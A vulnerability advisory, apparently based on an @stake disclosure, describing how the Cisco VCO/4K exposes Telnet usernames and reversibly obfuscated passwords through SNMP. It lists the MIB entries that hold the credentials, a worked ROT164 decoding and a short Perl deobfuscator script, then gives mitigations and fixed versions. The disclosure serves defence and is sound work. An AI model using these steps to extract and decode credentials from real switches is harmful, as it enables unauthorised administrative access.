COMMAND
Cisco
SYSTEMS AFFECTED
Cisco (Formerly Summa Four) VCO/4K software version 5.1.3 and below
PROBLEM
Following is based on a @stake Security Advisory by David
Goldsmith, Brian Carrier and Rex Warren. This advisory describes
a vulnerability that exists in Cisco Systems' Virtual Central
Office 4000 (VCO/4K). The VCO/4K is a programmable switch that
provides numerous telephony capabilities including voice
services, switching for wireless and wireline networks, and
circuit/packet-switched network gateway services. The VCO/4K can
be administered via several TCP/IP interfaces, including Telnet
and SNMP. There is a vulnerability in the SNMP interface that
allows an attacker to enumerate username and obfuscated password
pairs for the Telnet interface. Since the obfuscation method
used on the passwords is reversible, administrative access to the
VCO/4K can be obtained.
If an attacker knows the read-only community string of a VCO/4K,
then they can obtain a list of users and their obfuscated
passwords. The obfuscation can be easily reversed, allowing an
attacker to obtain additional privileges on the VCO/4K.
The SNMP MIB of the VCO/4K contains, among other data, a list of
usernames and passwords. These entries start at:
[ ... ]
enterprises.886.1.1.1.1.2.1 = "someuser"
enterprises.886.1.1.1.1.3.1 = 0
enterprises.886.1.1.1.1.4.1 = ".At4Cqq"
enterprises.886.1.1.1.1.5.1 = 0
[ ... ]
The enterprises.886.1.1.1.1.2.1 entry is the first username, with
enterprises.886.1.1.1.1.4.1 being the corresponding (albeit
obfuscated) password.
The password obfuscation algorithm is a substitution cipher that
replaces each ASCII character by one that is 164 places away. For
historical reasons, we will call this ROT164():
ROT164(X) = 164 - X
Using the example above:
ROT164(".") = 164 - 046 = 118 => "v"
ROT164("A") = 164 - 065 = 099 => "c"
ROT164("t") = 164 - 116 = 048 => "0"
ROT164("4") = 164 - 052 = 112 => "p"
ROT164("C") = 164 - 067 = 097 => "a"
ROT164("q") = 164 - 113 = 051 => "3"
ROT164("q") = 164 - 113 = 051 => "3"
The decryption code was written in PERL by Rex Warren. Due to the
cyclic properties of ROT164, the program accepts both the
plaintext and the obfuscated password as standard input and
returns the opposite version.
#!/usr/bin/perl
printf ("Cisco VCO/4K Password [De]Obfuscator\n");
printf ("\t\@stake, Inc.\n");
printf ("\tRex Warren, Brian Carrier, David Goldsmith\n");
printf ("Enter Password: ");
$pw = <STDIN>;
chop $pw;
printf("Result: ");
for ($pos = 0; $pos < length($pw); $pos++){
printf("%s", chr(164 - ord(substr($pw, $pos, 1))));
}
printf("\n");
SOLUTION
If SNMP is not required on the VCO/4K, then disable the service.
If it is required, then verify that the community string is
difficult to guess and that access to it is restricted.
Cisco Systems is aware of the vulnerability reported by @stake and
has prepared two software releases to address the problem. In
Cisco VCO/4K software version 5.1.4, the display of the usernames
and encrypted passwords has been removed from SNMP responses.
Version 5.2, to be released in early December, also includes
enhancements replacing the weak password encryption with MD5 --
similar to Type 5 passwords in Cisco IOS -- as well as general
improvements to access control.